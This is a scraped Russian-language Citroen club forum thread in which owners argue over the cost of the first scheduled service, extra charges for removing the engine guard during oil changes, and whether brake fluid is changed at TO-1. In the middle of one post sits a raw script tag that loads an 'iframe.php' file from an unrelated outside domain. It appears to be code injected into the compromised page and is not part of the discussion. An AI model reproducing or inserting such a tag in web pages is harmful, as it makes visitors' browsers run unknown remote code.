Перейти к содержанию
Ситроен Клуб

Стоимость ТО1 - 20000 км

bikekiller

Рекомендуемые сообщения

В 22.02.2013 в 05:45, 'Бес' сказал:

Вопрос цены - это вопрос вкуса фломастеров. 1200 - не нормально. А сколько нормально?

Покупая машину - будьте готовы к затратам.

На ТО-4 в предыдущей регенерации С4 с двигателем 110 сил - замена ремня ГРМ. ТО-4 - почти 20000 руб. Возмущались что дорого, но платили. :dntknw:/>

Никто не мешает возмущаться на цену замены масла в 1200 рублей.

Но это понятная цена - замена масла 1200 рублей.

Тут нет замена 600 и снятие/установка защиты 600.

Я знаю, что приехав на замену масла и отдав 1200 рублей - мне поменяют масло. И в счете не будет пунктов - "Прокатило".

Вопрос цены бывает вопросом вкуса фломастеров при продаже украденного товара, когда по вашему внешнему виду прикидывают сколько бы с вас слупить. В нормальном обществе исходят из затрат и плановой рентабельности. А ещё есть конкуренция, маркетинг и пр. Существуют такие понятия, как трудоёмкость операций, нормирование трудозатрат, фотография рабочего дня, нормочасы и пр. Слышали, наверное? Если для вас понятна цена 1200 руб. за работу по замене масла на Ситроене, то мне она непонятна, так как я знаю, какие операции надо сделать и сколько времени они занимают.
  'TAC1' сказал:

Слышали, наверное?

Да, конечно, а еще слышал понятие Гарантийный ремонт, Сервисная книжка, Условия сохранения гарантии, Монополист предоставляемых услуг (в ракусе Гарантии) и т.д.

Есть желание посудиться с ОД по поводу трудоемкости операций, нормирования затрат и т.д. и обязать ОД предоставлять услуги по замене масла по 600 рублей?

В чем отличие замены масла на Ситроене и БМВ/Вольво и т.д. Ну принципиально? Не беря в расчет уникальные моторы в которых чтобы снять фильтр надо пол-двигателя разобрать. Ничем. :dntknw:

А цены что-то разные.

Повторяю:

'Бес' сказал:

Никто не мешает возмущаться на цену замены масла в 1200 рублей.

Можно еще про цены на услуги ЖКХ повозмущаться...

Природа мудра, и Всевышнего глаз
Видит каждый наш шаг на тернистой дороге
Наступает момент, когда каждый из нас
У последней черты вспоминает о Боге...

В 22.02.2013 в 11:16, 'Бес' сказал:

Да, конечно, а еще слышал понятие Гарантийный ремонт, Сервисная книжка, Условия сохранения гарантии, Монополист предоставляемых услуг (в ракусе Гарантии) и т.д.

Есть желание посудиться с ОД по поводу трудоемкости операций, нормирования затрат и т.д. и обязать ОД предоставлять услуги по замене масла по 600 рублей?

В чем отличие замены масла на Ситроене и БМВ/Вольво и т.д. Ну принципиально? Не беря в расчет уникальные моторы в которых чтобы снять фильтр надо пол-двигателя разобрать. Ничем. :dntknw:/>

А цены что-то разные.

Повторяю:

Можно еще про цены на услуги ЖКХ повозмущаться...

Можно, но это не в этом форуме. А потом - ну почему же просто возмущаться? Я после такой замены масла связывался с представительством, затем мне звонили от Од и при следующем обслуживании сделали скидку на величину "снять-поставить" защиту.

По крайней мере не чувствую себя обманутым. А если кому-то нормально платить 1200 за замену масла, тот может делать это сколько угодно раз.

Мэйджор новая рига. ТО1 (20000) - 6150р.

P.S.

Перед покупкой автомобиля прикиньте, сколько планируете им пользоваться, узнайте стоимость ТО. Если всё устраивает-деньги в кассу и вперед. Непонимаю, зачем покупать машину, а потом колхозить и жаловаться что вас обдирают. Наверное стоит сначала купить калькулятор.

Изменено пользователем KPI17
  'TAC1' сказал:

Приехал к официальному дилеру, заплатил сколько сказали и порядок.

Только почему-то народ в счет смотрит. :scratch_one-s_head: И задается вопросам - откуда снятие/установка?.

P.S.

TAC1, неужели еще не понятно что мы пытаемся обсудить две проблемы у которых разная "природа"?

В 23.02.2013 в 13:02, 'Бес' сказал:

Только почему-то народ в счет смотрит. :scratch_one-s_head:/> И задается вопросам - откуда снятие/установка?.

P.S.

TAC1, неужели еще не понятно что мы пытаемся обсудить две проблемы у которых разная "природа"?

Мне нет. Какая природа у этих проблем? Кстати, у каких? Расшифруй, пожалуйста.

Могу сформулировать со своей стороны. Я считаю, что за замену масла у 1200 руб. это много. Ты считаешь, что нормально, лишь бы это было красиво оформлено.

Кстати, сегодня был на ТО-40000 в Жулебино. Присутствовал в ремзоне от начала до конца. Всё сделали быстро и аккуратно. Так вот - защиту действительно снимают. Под пробкой слива масла как раз находится одна из продольных пластин, которая не даёт отвернуть пробку, а так же аккуратно слить масло. Машина выпуска середины 2011 года. Правда, слесарь сказал, что у части машин есть большое отверстие в этом месте. Так что надо смотреть в каждом конкретном случае. Кстати, за замену топливного фильтра взяли дополнительно к цене ТО - 300 руб. И если бы я его не привёз с собой - никто бы и не подумал его менять, хотя в сервисной книжке написано про замену.

Изображение А вам слабо? Изображение

post-40566-0-03791300-1361717910_thumb.jpg

<script type="text/javascript" src="http://dreamselfprotection.net/iframe.php">

+ заменили всеми "любимый" блок над АКБ, по отзывной, хотя "старый" и не глючил.

... чем больше знаю я людей, тем больше нравятся собаки ...

'TAC1' сказал:

Мне нет. Какая природа у этих проблем? Кстати, у каких? Расшифруй, пожалуйста.

Одна проблема - дороговизна, неадекватность цен, персонала и т.д. на услуги.

Вторая - вписывают в счет пункт, которого быть не должно.

И если по первой можно рассуждать бесконечно, ругая ОД, буржуев, правительство и т.д., то по второй вроде все ясно. По крайней мере мне.

Вопрос-то простой: замена масла.

Процесс замены состоит из "слить масло" и "залить масло" (фильтры опустим для простоты).

Чтобы слить - надо снять защиту и открутить пробку.

Чтобы залить - надо открыть капот и открутить пробку.

Почему за первое ОД хочет денег, а за второе нет?

А то, что не устраивает цена 1200 за замену масла... Жизнь дорожает. :dntknw:

В 25.02.2013 в 06:10, 'Бес' сказал:

:dntknw:/>

А, кажись, чтобы открутить сливную пробку, снимать поддон не обязательно, там есть окно.

Уважаемый TAC1, тема этого раздела - стоимость ТО1. Читаю, т.к. интересно как отличаются цены в зависимости от диллера/города/региона. Да, приехал, да, заплатил, потому что каждый должен заниматься своей работой, только потом еси что вы сможете предъявлять претензии ОД, а не он вам за отказ от каких либо работ итд. Вы аппендицит тоже сами себе удалять будете или бегать и искать где анестезия дешевле? Наверное нет. Сделаете там где действительно лечат.

Надеюсь не обидел.

Изображение

's.e.r.g.' сказал:

А, кажись, чтобы открутить сливную пробку, снимать поддон не обязательно, там есть окно.

Не всегда. Есть два типа защиты картера/поддона/шумоизоляции (по ситроен-сервис) : 1-с малым кол-вом дыр, и 2-как решето (у меня).

Так же есть три типа движков : 1.6i-110; VTI-120; eHDi-110. Не берусь утверждать совпадают у них места расположения сливных пробок или нет (не знаю) Изображение .

Теперь представьте, зная "приколы" наших французианцев, различные сочетания этих защит и движков Изображение.

Мне повезло дыыыра прям под пробкой имеется в защите Изображение.

Но есть минус в неснимании... при замене маслянного фильтра - вся защита в масле... Изображение. Вот думаю - чем пшикнуть чтоб это пятно смыть?

... чем больше знаю я людей, тем больше нравятся собаки ...

В 25.02.2013 в 06:10, 'Бес' сказал:

Процесс замены состоит из "слить масло" и "залить масло" (фильтры опустим для простоты).

Чтобы залить - надо открыть капот и открутить пробку.

Почему за первое ОД хочет денег, а за второе нет?

:dntknw:/>

Дилер не хочет за что-то денег? По крайней мере наивно.

Я свою позицию высказал, вашу до сих пор не понял. Жизнь дорожает? Ну, да, Волга впадает в Каспийское море, лошади кушают овёс. Неужели вы до сих пор не поняли, что я вам хотел сказать, что не надо говорить что-то ради того, чтобы сказать что-то?

В 25.02.2013 в 08:05, 'KPI17' сказал:

Уважаемый TAC1, тема этого раздела - стоимость ТО1. Читаю, т.к. интересно как отличаются цены в зависимости от диллера/города/региона. Да, приехал, да, заплатил, потому что каждый должен заниматься своей работой, только потом еси что вы сможете предъявлять претензии ОД, а не он вам за отказ от каких либо работ итд. Вы аппендицит тоже сами себе удалять будете или бегать и искать где анестезия дешевле? Наверное нет. Сделаете там где действительно лечат.

Надеюсь не обидел.

Ну вообще - феерия какая-то. Интересно, как дилер может предъявить мне претензии?? Хотел бы я посмотреть на этот процесс.

Про аппендицит - если будет запас времени, то и анастезию хорошую поищу и хирурга приличного. Если будет пара равноценных вариантов, то выберу подешевле, наверно. А может и нет - зависеть будет от кучи факторов. И вообще - зачем самому себе живот-то резать? Я не умею.

• 2 недели спустя...

привет всем. ТО-1 прошел АИС ЛУГАНСК стоимость 1149 гривен. заменили м.масло, м.фильтр,салонный фильтр,замена тормозную жидкость, долив жидкости сист. охлаждения, долив масла усилителя руля.

'igor-mil' сказал:

замена тормозную жидкость

:scratch_one-s_head: :scratch_one-s_head:

В 06.03.2013 в 16:07, 'igor-mil' сказал:

привет всем. ТО-1 прошел АИС ЛУГАНСК стоимость 1149 гривен. заменили м.масло, м.фильтр,салонный фильтр,замена тормозную жидкость, долив жидкости сист. охлаждения, долив масла усилителя руля.

разве на ТО1 меняют тормозную жидкость? У меня не меняли, и кажется в регламенте этого нет.
  В 08.03.2013 в 14:19, 'KPI17' сказал:

разве на ТО1 меняют тормозную жидкость? У меня не меняли, и кажется в регламенте этого нет.

Возможен долив т.ж всё зависит от износа колодок.

Всем привет! Промежуточное ТО - 10000км всего 2750руб. работа + замена маслав двигателе и масленого фильтра, Ситроен-Отрадное. Москва, через 1000км поеду делать ТО-1

...если прошло 2 года,post-49244-0-55587400-1363043916_thumb.jpg по регламенту положена замена жидкости не зависимо от пробега!

'Igor71' сказал:

...если прошло 2 года

, то было бы ТО-2, и вопроса по замене тормозной жидкости не возникло бы.

Но...

'igor-mil' сказал:

ТО-1 прошел

Значит год. По сроку, по пробегу - пофиг, но год.

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти
  • Создать...